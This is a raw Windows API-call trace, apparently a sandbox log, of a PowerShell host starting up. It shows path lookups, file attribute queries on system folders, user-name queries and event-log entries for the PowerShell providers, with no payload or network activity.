	[0292.725] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0292.727] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.727] SetErrorMode (uMode=0x1) returned 0x1
	[0292.727] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd550 | out: lpFileInformation=0xcd550*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0292.727] SetErrorMode (uMode=0x1) returned 0x1
	[0292.727] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.727] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xcd1a0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.727] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0292.728] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xcd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.728] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0292.729] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcd120, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.729] SetErrorMode (uMode=0x1) returned 0x1
	[0292.729] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd380 | out: lpFileInformation=0xcd380*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0292.729] SetErrorMode (uMode=0x1) returned 0x1
	[0292.729] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcd120, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.729] SetErrorMode (uMode=0x1) returned 0x1
	[0292.729] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd380 | out: lpFileInformation=0xcd380*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0292.730] SetErrorMode (uMode=0x1) returned 0x1
	[0292.730] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.730] SetErrorMode (uMode=0x1) returned 0x1
	[0292.730] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd420 | out: lpFileInformation=0xcd420*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0292.730] SetErrorMode (uMode=0x1) returned 0x1
	[0292.730] CoTaskMemAlloc (cb=0x804) returned 0x12d3c0
	[0292.730] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x12d3c0, nSize=0xcd828 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd828) returned 0x1
	[0292.731] CoTaskMemFree (pv=0x12d3c0) 
	[0292.731] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0292.731] GetUserNameW (in: lpBuffer=0x1766d0, pcbBuffer=0xcd868 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd868) returned 1
	[0292.731] CoTaskMemFree (pv=0x1766d0) 
	[0292.732] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d58c88*="FileSystem", lpRawData=0x2d58a18) returned 1
	[0292.748] CoTaskMemAlloc (cb=0x104) returned 0x1b8429c0
	[0292.748] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8429c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0292.748] CoTaskMemFree (pv=0x1b8429c0) 
	[0292.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.750] CoTaskMemAlloc (cb=0x804) returned 0x12d3c0
	[0292.751] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x12d3c0, nSize=0xcd828 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd828) returned 0x1
	[0292.751] CoTaskMemFree (pv=0x12d3c0) 
	[0292.751] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0292.751] GetUserNameW (in: lpBuffer=0x1766d0, pcbBuffer=0xcd868 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd868) returned 1
	[0292.751] CoTaskMemFree (pv=0x1766d0) 
	[0292.752] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d5e4c8*="Function", lpRawData=0x2d5e258) returned 1
	[0292.909] CoTaskMemAlloc (cb=0x104) returned 0x1b8429c0
	[0292.910] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8429c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0292.910] CoTaskMemFree (pv=0x1b8429c0) 
	[0293.595] CoTaskMemAlloc (cb=0x804) returned 0x12d3c0
	[0293.595] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x12d3c0, nSize=0xcd828 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd828) returned 0x1
	[0293.595] CoTaskMemFree (pv=0x12d3c0) 
	[0293.595] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0293.595] GetUserNameW (in: lpBuffer=0x1766d0, pcbBuffer=0xcd868 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd868) returned 1
	[0293.596] CoTaskMemFree (pv=0x1766d0) 
	[0293.596] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d908a0*="Registry", lpRawData=0x2d90630) returned 1
	[0293.763] CoTaskMemAlloc (cb=0x804) returned 0x12d3c0
	[0293.763] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x12d3c0, nSize=0xcd828 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd828) returned 0x1
	[0293.763] CoTaskMemFree (pv=0x12d3c0) 
	[0293.763] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0293.763] GetUserNameW (in: lpBuffer=0x1766d0, pcbBuffer=0xcd868 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd868) returned 1
	[0293.764] CoTaskMemFree (pv=0x1766d0) 
	[0293.764] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d95cb8*="Variable", lpRawData=0x2d95a48) returned 1
	[0293.883] CoTaskMemAlloc (cb=0x104) returned 0x1b8429c0
	[0293.883] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8429c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0293.883] CoTaskMemFree (pv=0x1b8429c0) 
	[0293.883] CoTaskMemAlloc (cb=0x104) returned 0x1b8429c0
	[0293.883] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8429c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0293.883] CoTaskMemFree (pv=0x1b8429c0) 
	[0293.918] CoTaskMemAlloc (cb=0x804) returned 0x12d3c0
	[0293.918] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x12d3c0, nSize=0xcd828 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd828) returned 0x1
	[0294.537] CoTaskMemFree (pv=0x12d3c0) 
	[0294.537] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0294.537] GetUserNameW (in: lpBuffer=0x1766d0, pcbBuffer=0xcd868 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd868) returned 1
	[0294.538] CoTaskMemFree (pv=0x1766d0) 
	[0294.538] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2da98d0*="Certificate", lpRawData=0x2da9660) returned 1
	[0295.112] CoTaskMemAlloc (cb=0x104) returned 0x1b8429c0
	[0295.112] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8429c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.112] CoTaskMemFree (pv=0x1b8429c0) 
	[0295.113] GetLogicalDrives () returned 0x4
	[0295.114] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0295.114] CoTaskMemAlloc (cb=0x20e) returned 0x1c4b40
	[0295.114] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1c4b40 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0295.114] CoTaskMemFree (pv=0x1c4b40) 
	[0295.115] CoTaskMemAlloc (cb=0x104) returned 0x1b8429c0
	[0295.115] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8429c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.116] CoTaskMemFree (pv=0x1b8429c0) 
	[0295.116] CoTaskMemAlloc (cb=0x104) returned 0x1b8429c0
	[0295.116] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8429c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.116] CoTaskMemFree (pv=0x1b8429c0) 
	[0295.135] CoTaskMemAlloc (cb=0x104) returned 0x1b8429c0
	[0295.135] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8429c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.136] CoTaskMemFree (pv=0x1b8429c0) 
	[0295.142] CoTaskMemAlloc (cb=0x104) returned 0x1b8429c0
	[0295.142] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8429c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.142] CoTaskMemFree (pv=0x1b8429c0) 
	[0295.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.143] SetErrorMode (uMode=0x1) returned 0x1
	[0295.143] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd470 | out: lpFileInformation=0xcd470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0295.143] SetErrorMode (uMode=0x1) returned 0x1
	[0295.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.143] SetErrorMode (uMode=0x1) returned 0x1
	[0295.143] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd470 | out: lpFileInformation=0xcd470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0295.144] SetErrorMode (uMode=0x1) returned 0x1
	[0295.144] CoTaskMemAlloc (cb=0x104) returned 0x1b8429c0
	[0295.144] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8429c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.144] CoTaskMemFree (pv=0x1b8429c0) 
	[0295.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcd3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.746] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcd220, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0295.746] SetErrorMode (uMode=0x1) returned 0x1
	[0295.746] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd430 | out: lpFileInformation=0xcd430*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0295.746] SetErrorMode (uMode=0x1) returned 0x1
	[0295.746] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcd220, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0295.746] SetErrorMode (uMode=0x1) returned 0x1
	[0295.746] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd430 | out: lpFileInformation=0xcd430*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0295.746] SetErrorMode (uMode=0x1) returned 0x1
	[0295.746] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcd230, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0295.746] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xcd120, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0295.747] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xcd220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0295.747] SetErrorMode (uMode=0x1) returned 0x1
	[0295.747] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xcd430 | out: lpFileInformation=0xcd430*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0295.747] SetErrorMode (uMode=0x1) returned 0x1
	[0295.747] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xcd220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0295.747] SetErrorMode (uMode=0x1) returned 0x1
	[0295.747] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xcd430 | out: lpFileInformation=0xcd430*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0295.747] SetErrorMode (uMode=0x1) returned 0x1
	[0295.747] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xcd230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0295.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0xcd120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0295.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcd220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.747] SetErrorMode (uMode=0x1) returned 0x1
	[0295.747] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd430 | out: lpFileInformation=0xcd430*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0295.748] SetErrorMode (uMode=0x1) returned 0x1
	[0295.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcd220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.748] SetErrorMode (uMode=0x1) returned 0x1
	[0295.748] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd430 | out: lpFileInformation=0xcd430*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0295.748] SetErrorMode (uMode=0x1) returned 0x1
	[0295.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcd230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0xcd120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.748] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xcd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0295.748] SetErrorMode (uMode=0x1) returned 0x1
	[0295.748] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xcd470 | out: lpFileInformation=0xcd470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0295.749] SetErrorMode (uMode=0x1) returned 0x1
	[0295.749] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xcd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0295.749] SetErrorMode (uMode=0x1) returned 0x1
	[0295.749] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xcd470 | out: lpFileInformation=0xcd470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0295.749] SetErrorMode (uMode=0x1) returned 0x1
	[0295.749] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xcd270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0295.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0xcd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0295.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.749] SetErrorMode (uMode=0x1) returned 0x1
	[0295.749] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd470 | out: lpFileInformation=0xcd470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0295.749] SetErrorMode (uMode=0x1) returned 0x1
	[0295.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.749] SetErrorMode (uMode=0x1) returned 0x1
	[0295.750] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd470 | out: lpFileInformation=0xcd470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0295.750] SetErrorMode (uMode=0x1) returned 0x1
	[0295.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcd270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0xcd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcd4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.752] SetErrorMode (uMode=0x1) returned 0x1
	[0295.752] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd730 | out: lpFileInformation=0xcd730*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0295.752] SetErrorMode (uMode=0x1) returned 0x1
	[0295.761] CoTaskMemAlloc (cb=0x804) returned 0x12d3c0
	[0295.761] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x12d3c0, nSize=0xcda98 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcda98) returned 0x1
	[0295.761] CoTaskMemFree (pv=0x12d3c0) 
	[0295.762] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0295.762] GetUserNameW (in: lpBuffer=0x1766d0, pcbBuffer=0xcdad8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcdad8) returned 1
	[0295.762] CoTaskMemFree (pv=0x1766d0) 
	[0295.762] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2de25b8*="Available", lpRawData=0x2de2348) returned 1
	[0295.889] CoTaskMemAlloc (cb=0x104) returned 0x1b8429c0
	[0295.889] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8429c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.889] CoTaskMemFree (pv=0x1b8429c0) 
	[0295.889] CoTaskMemAlloc (cb=0x104) returned 0x1b8429c0
	[0295.889] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8429c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.889] CoTaskMemFree (pv=0x1b8429c0) 
